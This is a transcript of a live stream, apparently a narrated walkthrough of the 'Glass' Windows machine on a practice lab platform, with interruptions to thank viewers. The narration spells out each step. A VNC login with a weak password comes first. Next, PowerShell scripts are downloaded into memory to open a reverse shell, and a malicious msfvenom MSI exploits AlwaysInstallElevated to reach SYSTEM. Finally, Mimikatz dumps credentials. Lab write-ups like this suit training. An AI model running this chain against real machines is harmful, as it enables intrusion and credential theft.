Alright, so we are on glass. Start up this guy. Just started, so give him a minute. These machines are super quick though, DZ. They're probably super quick because there's not many people on, but they are super quick. So let's go ahead and exit attack Y. Clear that out. Exit out of there. Exit out of here. Let's go ahead and do a CD back. Oh, I was going to do an MF import. There it is. I was like, I thought I did this. Make directory glass. CD into there. And we'll exit out this guy. CD into glass. Oh, CD back / glass. And let's go ahead and start up this guy. Start up an MF scan on him again. Let's see what we can do with this guy. So we obviously have SMB open. 50 VNC. 5900. That's a port that we want to look at. Especially if it's pointing out toward the internet like that. Because if there's no... We might just be able to just hop right into them. If there's not any authentication on that VNC. Oh, nice NGIX. Or nice great fan. Definitely just read Engine X on that one. There. Couldn't spell. VNC viewer. So we do need a password. What about just password? Might be able to try a brute force. Let's freaking go! The password was password. Alright, so that took 12 seconds. Holy shit. Oh, whoops, that's not what I wanted. Oh, God. Am I not going to be able to copy and paste off a VNC viewer? Hey, thanks a lot for the follow. Oh, hey, thanks for the raid, Tiberus. Thank you very much. How was the stream? I was kind of watching a little bit earlier. Then I started up mine. How was it? I saw you doing, fuck, what was the box that you were doing? I don't know, I was too busy laughing. Someone said netstat again. Alright, so we got into VNC viewer. Let's see if we can just add and use. Let's see who we are first. Let's go into PowerShell. Let's see who we are. So we got into VNC through password. We don't really have any creds or anything like that on here. See if we're in some type of weird group or something like that. Doesn't look like we're really in a weird group. That's the Authority Interactive. But Manicus, did Tiberus finally, did he get in that box? Did he get it? Thanks a lot for the raid. I know you guys all know him. I know everyone here knows him. But let's go ahead and still do our little... There we go. I know that everybody here knows him. Tiberus, he's freaking a damn genius. Alright, so we can get in through VNC through with the password. We just fired it off, tried it. Hey, thanks a lot for the follow, Kid Fire. We can get in through that, so we know that much. And we got in through VNC viewer. We hopped into here. What's in the recycle? Why is there so much stuff in the recycling bin? New folder in the recycling bin? What are you doing? Yeah, I would like to restore you. Hey, thanks a lot for the follow, Bonzo. Hey, I'm not as smart as DZ64. Or DZ. I'm so used to saying DZ. As Tiberus. He is extremely smart. Alright, so we're in through VNC and everything like that. Now we just need to figure out what to do from here. We're also on CyberSec Labs, just so you guys know. That's the one that we're just going to be on that all day, going through every single Windows machine. And then, if we have time, on every single, the Active Directory machines that they have, right? So, I'm wondering, we could just probably just make, we could probably just download NC64 and just make a callback to us, right? Or we could probably download something like a PowerShell, Let's go ahead and download a PowerShell script, not NC64. Let me get this guy a little bit bigger for you guys. Ooh, size 20. And let's go ahead and CD into my tools over here. CD into tools. And we go to locate invoke PowerShell. Okay, so he's in there. Python 3. Let's actually cat him like real quick. Make sure I didn't do anything weird to him. Nope, I think I did to the EX one. The weird stuff. Nope, I did do something to him also. Okay, so let's go ahead and do a sublime text on invoke PowerShell. And we'll scroll all the way down. Let's get rid of this like right here because we can just call it once we get it. And let's put that guy into memory. So we'll do a quick Python 3 server, HTTP server on port 80. And we'll come back over here, IEX, IWR, use basic parsing, HTTP. Let's go and grab my IP address. Hey, thanks so a lot for the follow, the Threat Hunter. Thank you very much. Grab my IP address over here. And we might as well do an RL wrap and see. We'll do port 4444. Get that guy ready to go right. Slash invoke PowerShell. Is it power capital S? I think it is. Yeah, we'll just copy this. There we go. Okay, we'll throw that guy into memory. And then from here, we'll go ahead and we'll do a quick invoke PowerShell. TCP, TAC reverse. And we're going to send that back to the IP address of 10.10.0.16. TAC port is going to be 4444. And let's see if we get a hit back here. We do. Awesome. Let's go. Let's freaking go. All right, let's go ahead and CD in a desktop. And we have access.txt in there. Let's go and type out our access.txt. And we get our first hash for this guy, for glass here. So let's go and submit that hash. Boom. All right, let's do a... So we didn't really have anything privs, anything like that. Let's try to get maybe power up on here. We'll do an IEX, IWR. Use basic parsing. 10.10.0.16 slash powerup.ps1. Let's see if we got anything with that. Do I even have powerup.ps1 down here? Why do you try to, I might not have, how do I locate PowerUp? Is it like that? Okay, so it's like that. Okay, that's probably why. You can't figure out what it is. IEX. Let's go and grab this like right here. IWR. Use basic parsing. 10.10.0.16 slash powerup.ps1. All right, let's go ahead and do a invoke all checks. See what we get with that. Majestic Logic, subscribed on YouTube. Let's let that guy run like right there. We have a always install elevated. Let's freaking go. Yes, it is. Good job. Good job, Alrex. Good freaking job. Let's go. You got the time correct. For me, at least. Not for most human beings, but for me. You actually got it correct. Nice. I'm going to make a call back over here. We're going to have to re-download that guy because we put him into memory. Use basic parsing. 10.10.0.16 slash power up.ps1. And we are going to run this guy right here. Let's see if we can just run just write user add MSI. If not, then we're going to have to make an MSI and everything like that. All right. So the output path is user MSI. I believe we can just run it now. If we have always install elevated, I've never really done it with power up for this one. I think we have to actually MSI execute right. But can I do that? Can I go back to command shell on here? Probably not, huh? You know where we can do it at, though? Because we just put it on there, is right here. Oh, he's trying to open up. That's why. Can automatically install or uninstall via Windows feature. Okay. So let's go ahead and let's head back over to here. Because he's trying to actually open up over there, huh? And let's try to... Let's clear this out. So I can actually see. Command prompt. And let's do an MSI execute, right? It's going to be an MSI execute. We'll do quiet. QN/I. Quiet. QN/I. Right? Should be like that. To be able to install our user add MSI, right? Windows server. Okay, so we are on the wrong net framework. Okay, that's okay. We should still be able to make an MSF Venom file for an MSI, right? And we can make like a reverse shell or something like that, right? So let's go ahead and we'll just go to work in the VNC thing since we have that up. And I can tab some of that through it. MSF Venom, TAC-P. We'll do a Windows x64 shell reverse TCP. We'll do something like that. lhost is going to equal 10.10.0.16. lport will equal 1234. Then we'll do a TAC-F. It's going to be an MSI file, right? And we'll call that shell.msi. That should be it, like right there, I think. I think that should be it for this guy. All right, thanks a lot, D. Crucian, for the file. Thank you very much. All right, so we got that guy now. Let's go ahead and throw our Python server over into here. And let's go ahead and get him up in here. So we'll do a wget http. Let's do a use basic parsing just in case. I don't really feel like having to come back saying Internet Explorer has not been started. PowerShell first. Tech EP bypass. All right. Hey, thanks a lot for the follow, Brian. And then we'll do a wget use basic parsing http 10.10.0.16 /shell.msi. Our file is going to be shell.msi. All right, cool. We got that. And now we should be able to go back to command prompt. And let's start up a listener over here. So we'll do a netcat or an RL wrap, because I keep getting yelled at on YouTube for not using that. RL wrap. Did I do 1, 2, 3, 4? I did. Okay. And we'll do our same exact command that we did before with the MSI execute. This time we're just going to do shell. So we're going to do MSI execute quietly, please. Shell.msi. Let's go! And we should be all installed elevated, so we are NT Authority system. Awesome. Let's frickin' go. Alright. Now, if we really want to be mean, can we go to PowerShell on here? We can. If we really want to be assholes, then we can do all of our Mimicat stuff and things like that. EP bypass, that's for execution policy, Alan Rex. So sometimes PowerShell won't let you execute policies and things like that. I didn't actually need to do that one on that one because we were doing a wget. But sometimes it won't let you like import modules or do like an IEX, IWR, things like that. If you don't do an execution policy bypass. All right, let's do a Python 3 TAC MHP server because we want to be mean. And we're going to do an IEX, IWR, use basic parsing. HTTP 10.10.0.16 / invoke mimikatz.ps1. And we'll do a invoke mimikatz TAC command LSA dump LSA dump LSA / patch. What else? Creds vault in case there's anything in there. And then probably just do a dump all after that. That should be good enough for now. Let's go ahead and do that. Let's see what we can dump here. You could dump shit. Okay, cool. So we got some NTLMs here. Obviously, we got the administrator like right here. Let's go ahead and let's put him into CD into desktop, cybersec, and this one was called Glass, right? And let's go ahead and do a nano hash.text, and we'll throw him into there. We'll throw this one in there, and that is going to be it. All right, let's do a John hash.text, format NT, see if we can crack any of them. We cannot, okay, with Raku.text, that's okay. Let's go ahead and CD into the users / administrator, CD in desktop, and we'll grab that system.txt. Let's freaking go. All right, awesome. Hey, thanks a lot for the follow, Yellen. Thanks a lot. So let's throw that system.txt into our guy over here for Glass. And we will submit that hash. And we are now done with Glass. Let's start up unattended. Was that going to be unattended XML or something like that? I feel like. Usually just look at the name of it and you're like, huh. I feel like I know what that is. Like there's one on here called Eternal. I feel like we know what that one is.